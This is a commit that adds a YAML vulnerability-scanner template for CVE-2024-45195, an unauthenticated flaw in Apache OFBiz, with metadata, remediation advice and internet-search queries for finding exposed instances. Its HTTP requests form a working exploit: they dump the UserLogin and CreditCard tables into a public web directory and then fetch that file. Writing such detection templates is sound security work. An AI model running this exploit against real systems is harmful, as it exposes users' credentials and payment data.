Create CVE-2024-45195.yaml

2024-09-06 06:54:42 +05:30 · 2024-09-06 06:54:42 +05:30 · cccd8037d7
parent 4ac579d5e6
commit cccd8037d7
1 changed files with 61 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-45195.yaml
+++ b/http/cves/2024/CVE-2024-45195.yaml
@ -0,0 +1,61 @@
+id: CVE-2024-45195
+
+info:
+  name: Apache OFBiz - Unauthenticated Remote Code Execution
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server
+  remediation: |
+    Users are recommended to upgrade to version 18.12.16, which fixes the issue.
+  reference:
+    - https://ofbiz.apache.org/download.html
+    - https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-45195
+    cwe-id: CWE-425
+    epss-score: 0.00045
+    epss-percentile: 0.16342
+    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: apache
+    product: ofbiz
+    shodan-query:
+      - ofbiz.visitor=
+      - http.html:"ofbiz"
+    fofa-query:
+      - app="apache_ofbiz"
+      - body="ofbiz"
+  tags: cve,cve2024,apache,ofbiz,rce,instrusive
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard
+
+      - |
+        GET /common/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "<?xml version="
+          - "entity-engine-xml"
+        condition: and
+
+      - type: word
+        part: content_type_2
+        words:
+          - "text/plain"